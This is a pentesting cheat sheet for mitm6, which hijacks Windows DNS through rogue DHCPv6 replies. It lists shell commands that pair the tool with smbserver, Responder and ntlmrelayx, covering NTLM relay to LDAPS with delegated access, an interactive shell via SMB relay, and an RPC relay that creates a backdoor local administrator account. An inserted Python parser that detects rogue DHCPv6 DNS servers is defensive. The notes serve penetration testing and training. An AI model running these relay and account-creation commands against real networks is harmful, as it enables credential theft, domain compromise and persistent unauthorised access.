# Resources

# mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server.
# It does this by replying to DHCPv6 messages, providing victims with a link-local
# IPv6 address and setting the attacker's host as the default DNS server.

# mitm6 issues DHCPv6 leases to clients that last for 300 seconds (5 minutes).
# Because of this, several DNS queries may fail, leaving clients
# unable to access services that rely on DNS names.
# You can, however, change this in the source code.

# Create a fake DNS server for targets
$ sudo mitm6 -d lab.local
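
Detection side of the DHCPv6 behaviour described above, as an added example (not part of the original notes or of mitm6): a parser for DHCPv6 Advertise/Reply payloads that flags any DNS server (option 23) outside an approved set and reports the offered lease lifetime. The resolver address 2001:db8::53, the function names and the sample packets are constructed assumptions.

```python
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7                      # DHCPv6 message types (RFC 8415)
OPT_IA_NA, OPT_IAADDR, OPT_DNS = 3, 5, 23    # option codes (RFC 8415, RFC 3646)

def parse_options(buf):
    """Yield (code, data) for each option TLV; stop at a truncated option."""
    off = 0
    while off + 4 <= len(buf):
        code, length = struct.unpack_from("!HH", buf, off)
        data = buf[off + 4:off + 4 + length]
        if len(data) < length:
            return
        yield code, data
        off += 4 + length

def inspect(payload, src, allowed_dns):
    """Return an alert dict when an Advertise/Reply names a DNS server outside allowed_dns."""
    if len(payload) < 4 or payload[0] not in (ADVERTISE, REPLY):
        return None
    dns, leases = [], []
    for code, data in parse_options(payload[4:]):
        if code == OPT_DNS:  # list of 16-byte recursive resolver addresses
            dns += [ipaddress.IPv6Address(data[i:i + 16]) for i in range(0, len(data) - 15, 16)]
        elif code == OPT_IA_NA and len(data) >= 12:  # IAID, T1, T2, then nested options
            for sub, sdata in parse_options(data[12:]):
                if sub == OPT_IAADDR and len(sdata) >= 24:  # address, preferred, valid
                    valid = struct.unpack_from("!I", sdata, 20)[0]
                    leases.append((ipaddress.IPv6Address(sdata[:16]), valid))
    rogue = [d for d in dns if d not in allowed_dns]
    return {"server": src, "rogue_dns": rogue, "leases": leases} if rogue else None

def opt(code, data):
    """Encode one option TLV (used only to build the constructed samples)."""
    return struct.pack("!HH", code, len(data)) + data

def sample_reply(dns, leased, lifetime):
    """Constructed sample input: Reply carrying one IA_NA lease and one DNS server."""
    addr = ipaddress.IPv6Address(leased).packed + struct.pack("!II", lifetime, lifetime)
    ia_na = opt(OPT_IA_NA, struct.pack("!III", 1, 0, 0) + opt(OPT_IAADDR, addr))
    return bytes([REPLY]) + b"\x00\x00\x01" + ia_na + opt(OPT_DNS, ipaddress.IPv6Address(dns).packed)

if __name__ == "__main__":
    approved = {ipaddress.IPv6Address("2001:db8::53")}  # assumed site resolver
    print(inspect(sample_reply("fe80::1234", "fe80::abcd", 300), "fe80::1234", approved))
    print(inspect(sample_reply("2001:db8::53", "2001:db8::100", 86400), "fe80::1", approved))
```

Feed it the UDP payload of server-to-client DHCPv6 traffic (source port 547) from a capture or sensor. On a network with no authorized DHCPv6 server, pass an empty set so that every offered DNS server is reported.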

Using with SMB server

# First shell
$ sudo mitm6 -i eth0

# Second shell
$ smbserver.py SHARE_NAME path/to/share

Using with Responder

# First shell
$ sudo mitm6 -i eth0

# Second shell
$ responder -I eth0 -wFv

Using with ntlmrelayx

# First attacking shell
$ sudo mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqdn

# Second attacking shell
$ ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

# wh == server hosting WPAD (attacking IP)
# t == target for relay
# i == open interactive shell
$ ntlmrelayx.py -wh -t smb:// -i

# Or
$ ntlmrelayx.py -ip -t rpc://example.local -c "net user xuser xpass /add && net localgroup Administrators xuser /add"